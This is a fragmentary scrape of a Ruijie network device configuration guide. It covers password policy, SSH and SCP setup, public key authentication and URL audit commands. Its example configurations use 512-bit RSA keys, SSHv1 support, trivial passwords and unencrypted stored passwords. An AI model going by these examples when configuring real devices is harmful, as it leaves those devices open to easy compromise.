  • Page 954 Configuration Guide Configuring Password Policy 13 Configuring Password Policy 13.1 Overview The Password Policy is a password security function provided for local authentication of the device. It is configured to control users' login passwords and login states. • The following sections introduce the password policy only. 13.1.1.1 Protocols and Standards 13.2 Features 13.2.1.1 Basic Concepts...
  • Page 955 not meet system requirements, or the new password entered twice in a row does not match, the system will ask the user to input the new password again. Guard Against Repeated Use of Passwords When changing the password, the user sets a new password while the old password is recorded in the user's password history.
  • Page 956 13.3.1 Configuring the Password Security Policy 13.3.1.1 Networking Requirements • Provide a password security policy for local authentication of the device. Users can configure different password security policies to implement password security management. 13.3.1.2 Notes ...
  • Page 957 13.3.1.4 Verification Configure a local user on the device, and configure a valid password and an invalid password for the user. • When you configure the valid password, the device correctly adds the password. • When you configure the invalid password, the device displays a corresponding error log.
  • Page 958 password history records of a user exceeds the maximum number configured for the user, the new password history record overwrites the user's oldest password history record. Enabling the Strong Password Detection Function Command Syntax password policy strong ...
  • Page 959 Set the no-repeat times of password history records to 3. • Enable the strong password detection function. Ruijie# configure terminal Ruijie(config)# password policy min-size 8 Ruijie(config)# password policy life-cycle 90 Ruijie(config)# service password-encryption Ruijie(config)# password policy no-repeat-times 3 Ruijie(config)# password policy strong...
  • Page 960 Password no-repeat-times: Enabled (max history record: 3) 13.3.1.7 Common Errors • The time configured for giving a pre-warning notice about password expiry to the user is greater than the password life cycle. 13.4 Monitoring 13.4.1.1 Displaying the Running Status Command Function show password policy...
  • Page 961: Configuring SSH

    SSH connection with an SSH server device. In this way, the local device can safely log in to a remote device through SSH for management. Currently, a device can work as either the SSH server or an SSH client, supporting the SSHv1 and SSHv2 versions. Ruijie SSH service supports both IPv4 and IPv6.
  • Page 962: Scenario

    Configuration Guide Configuring SSH Application / Description: SSH AAA Authentication: Use the authentication, authorization and accounting (AAA) mode for SSH user authentication. SSH Public Key Authentication: Use public key authentication for SSH user authentication. SSH File Transfer: Use the Secure Copy (SCP) commands on the client to exchange data with the SSH server.
  • Page 963: Scenario

    • Five lines, including Line 0 to Line 4, are activated concurrently. The login password is "passzero" for Line 0 and "pass" for the remaining lines. Any user name can be used. Figure 14-2 Networking Topology of SSH Local Line Password Authentication Deployment •
  • Page 964: Scenario

    clients. Two authentication methods, Radius server authentication and local authentication, are provided in the AAA authentication method list to ensure reliability. The Radius server authentication method is preferred. If the Radius server does not respond, local authentication is used. Figure 14-3 Networking Topology of SSH AAA Authentication Deployment •
  • Page 965: Scenario

    • After the key is generated on the client, the SSH server copies the public key file from the client to the flash and associates the file with the SSH user name. Each user can be associated with one RSA public key and one DSA public key.
  • Page 966 To ensure secure communication, interaction between an SSH server and an SSH client undergoes the following seven stages: • Connection setup The server listens on port 22 for connection requests from the client. After sending an initial socket connection request, the client sets up a TCP socket connection with the server.
  • Page 967 SCP Service After the SCP service is enabled, you can directly download files from the network device and upload local files to the network device. In addition, all interactive data is encrypted, providing authentication and security. 14.3.1 SSH Server Enable the SSH server function on a network device, and you can set up a secure connection with the network device through the SSH client.
  • Page 968 Run the ip ssh time-out command to configure the user authentication timeout of the SSH server. Use the no form of the command to restore the default timeout. The SSH server starts the timer after receiving a user connection request. If authentication does not succeed before the timeout is reached, authentication times out and fails.
  • Page 969 Related Configuration • Enabling the SCP Server By default, the SCP server function is disabled. Run the ip scp server enable command to enable the SCP server function on a network device. 14.4 Configuration The SSH function is not supported on AP110-W or AP120-W. Configuration Description and Command It is mandatory to enable the SSH server.
  • Page 970 • You can specify the SSH version. • You can configure the SSH authentication timeout. • You can configure the maximum number of SSH authentication retries. Notes • The precondition for configuring a device as the SSH server is that communication is working on the network where the device resides, and the administrator can access the device management interface to configure related parameters.
  • Page 971 • Only SSHv2 supports authentication based on the public key. This configuration associates a public key file on the client with a user name. When a client is authenticated upon login, a public key file is specified based on the user name. Verification •
  • Page 972 SSHv1 uses an RSA key, whereas SSHv2 uses an RSA or DSA key. If an RSA key is generated, both SSHv1 and SSHv2 are supported. If only a DSA key is generated, only SSHv2 can use the key. •
  • Page 973 SSH Server Ruijie#configure terminal Ruijie(config)# crypto key generate rsa Choose the size of the rsa key modulus in the range of 512 to 2048 and the size of the dsa key modulus in the range of 360 to 2048 for your Signature Keys.
  • Page 974 key. If the public information about the RSA key exists, the RSA key has been generated. SSH Server Ruijie(config)#show crypto key mypubkey rsa % Key pair was generated at: 1:49:47 UTC Jan 4 2013 Key name: RSA1 private Usage: SSH Purpose Key Key is not exportable.
  • Page 975 Steps Run the ip ssh peer username public-key { rsa | dsa } filename command to associate a public key file of the client with a user name. When the client is authenticated upon login, a public key file (for example, RSA) is specified based on the user name. SSH Server Ruijie#configure terminal Ruijie(config)# ip ssh peer test public-key rsa flash:rsa.pub...
  • Page 976: Scenario

    • Verification Configure the public key authentication login mode on the SSH client and specify the private key file. Check whether you can successfully log in to the SSH server from the SSH client. If yes, the public key file on the client is successfully associated with the user name, and public key authentication succeeds.
  • Page 977 Host Name (or IP address) indicates the IP address of the host to log in to. In this example, the IP address is 192.168.23.122. Port indicates port 22, that is, the default port on which SSH listens. Connection type is SSH.
  • Page 978 As shown in Figure 14-8, select 2 as the preferred SSH protocol version in the Protocol options pane because SSHv2 is used for login. Figure 14-9...
  • Page 979 As shown in Figure 14-9, select Attempt "keyboard-interactive" auth as the authentication method to support authentication based on the user name and password. Then, click Open to connect to the configured server host, as shown in Figure 14-10. Figure 14-10 The PuTTY Security Alert box indicates that you are connecting to the server 192.168.23.122, and asks whether to accept the host key sent from the server.
  • Page 980 If you select Yes, a login dialog box is displayed, as shown in Figure 14-11. Figure 14-11 Type in the correct user name and password, and you can log in to the SSH terminal interface, as shown in Figure 14-12.
  • Page 981 Run the show ip ssh command to display the configurations that are currently effective on the SSH server. • Run the show ssh command to display information about every SSH connection that has been established. Ruijie#show ip ssh SSH Enable - version 1.99 Authentication timeout: 120 secs Authentication retries: 3 Ruijie#show ssh...
  • Page 982: Scenario

    SSH server is reachable. The interface IP address configurations are shown in Figure 14-14. The detailed procedures for configuring IP addresses and routes are omitted. Ruijie(config)# enable service ssh-server Ruijie(config)#crypto key generate rsa % You already have RSA keys.
  • Page 983 How many bits in the modulus [512]: % Generating 512 bit RSA1 keys ...[ok] % Generating 512 bit RSA keys ...[ok] Ruijie(config)#interface fastEthernet0/1 Ruijie(config-if-fastEthernet0/1)#ip address 192.168.23.122 255.255.255.0 Ruijie(config-if-fastEthernet0/1)#exit Ruijie(config)#line vty 0 Ruijie(config-line)#password passzero Ruijie(config-line)#privilege level 15 Ruijie(config-line)#login...
  • Page 984 • Verification Run the show running-config command to display the current configurations. • Verify that the SSH client configurations are correct. SSH Server Ruijie#show running-config Building configuration... enable secret 5 $1$eyy2$xs28FDw4s2q0tx97 enable service ssh-server interface fastEthernet0/1 ip address 192.168.23.122 255.255.255.0...
  • Page 985 Set up a connection, and enter the correct password. The login password is "passzero" for Line 0 and "pass" for the remaining lines. Then, the SSH server operation interface is displayed, as shown in Figure 14-15. Figure 14-15 Ruijie#show users Line User...
  • Page 986: Scenario

    SSH Server Ruijie(config)# enable service ssh-server Ruijie(config)#crypto key generate rsa % You already have RSA keys. % Do you really want to replace them? [yes/no]: Choose the size of the key modulus in the range of 360 to 2048 for your Signature Keys.
  • Page 987 Ruijie(config-if-gigabitEthernet1/1)#ip address 192.168.217.81 255.255.255.0 Ruijie(config-if-gigabitEthernet1/1)#exit Ruijie#configure terminal Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 192.168.32.120 Ruijie(config)#radius-server key aaaradius Ruijie(config)#aaa authentication login method group radius local Ruijie(config)#line vty 0 4 Ruijie(config-line)#login authentication method Ruijie(config-line)#exit Ruijie(config)#username user1 privilege 1 password 111 Ruijie(config)#username user2 privilege 10 password 222...
  • Page 988 aaa authentication login method group radius local username user1 password 111 username user2 password 222 username user2 privilege 10 username user3 password 333 username user3 privilege 15 no service password-encryption radius-server host 192.168.32.120 radius-server key aaaradius enable secret 5 $1$hbgz$ArCsyqty6yyzzp03 enable service ssh-server interface gigabitEthernet1/1...
  • Page 989: Scenario

    Ruijie#show users Line User Host(s) Idle Location 0 con 0 idle 00:00:31 * 1 vty 0 user idle 00:00:33 192.168.217.60 • Configuring Public Key Authentication of SSH Users Scenario Figure 14-17 SSH users can use the public key for user authentication, and the public key algorithm is RSA or DSA, as shown in Figure 14-17. SSH is configured on the client so that a secure connection is set up between the...
  • Page 990 When a key is being generated, you need to constantly move the mouse over a blank area outside the green progress bar; otherwise, the progress bar does not move and key generation stops, as shown in Figure 14-19.
  • Page 991 To ensure the security of RSA public key authentication, the length of the generated RSA key pair must be equal to or larger than 768 bits. In this example, the length is set to 1024 bits. Figure 14-20...
  • Page 992 After the key pair is generated, click Save public key, type in the public key name test_key.pub, select the storage path, and click Save. Then click Save private key. The following prompt box is displayed. Select Yes, type in the name test_private, and click Save.
  • Page 993 SSH Server Ruijie#configure terminal Ruijie(config)# ip ssh peer test public-key rsa flash:test_key.pub • Verification After completing the basic configurations of the client and the server, specify the private key file test_private on the PuTTY client, and set the host IP address to 192.168.23.122 and port to 22 to set up a connection between the client and the server.
  • Page 994 Common Errors • The no crypto key generate command is used to delete a key. 14.4.2 Configuring the SCP Service Configuration Effect After the SCP function is enabled on a network device, you can directly download files from the network device and upload local files to the network device.
  • Page 995: Scenario

    • Configuration Steps Run the ip scp server enable command to enable the SCP server. Ruijie#configure terminal Ruijie(config)#ip scp server enable • Verification Run the show ip ssh command to check whether the SCP server function is enabled. Ruijie(config)#show ip ssh SSH Enable - version 1.99...
  • Page 996 -l: Limits the transmission speed (unit: Kbit/s). For other parameters, see the file scp.0. SSH Server Ruijie#configure terminal Ruijie(config)# ip scp server enable • Verification File transmission example on the Ubuntu 7.10 system: Set the username of a client to test and copy the config.text file from the network device with the IP address 192.168.195.188 to the /root directory on the local device.
  • Page 997 Command / Description: show ip ssh: Displays the effective SSH server configurations. show ssh: Displays the established SSH connections. show crypto key mypubkey: Displays the public information of the SSH public key. Debugging System resources are occupied when debugging information is output. Therefore, disable debugging immediately after use.
  • Page 998: Scenario

    Configuration Guide Configuring Content Audit 15 Configuring Content Audit 15.1 Overview URL audit mainly supervises URL access for intranet users. 15.2 Applications Application Description Typical URL Audit Scenario Basic scenarios and features of URL audit 15.2.1 Typical URL Audit Scenario Scenario URL audit: mainly monitors and audits URL access for intranet users.
  • Page 999 • URL audit is disabled by default. • Run the url-rule audit-default-enable command to enable URL audit. • Run the url-rule apply referrer and url-audit { except-postfix | except-regexp | first-get | only-get | optimize-cache [ time ] } commands to optimize URL audit by avoiding auditing spam URLs.
  • Page 1000 • Configuring URL Audit Optimization • (Optional) URL audit optimization is enabled by default. You can disable it if you want to change the default setting or this function is not required. Verification Use the show running-config command to display the configuration status. Related Commands •
  • Page 1001 Configuration Example • Enabling Default URL Audit • Configuration Steps Enable default URL audit. Ruijie# configure terminal Ruijie(config)# url-rule audit-default-enable Ruijie(config)# end • Verification Use the show running-config command to display the configuration status. • Enabling the Referer Field Audit •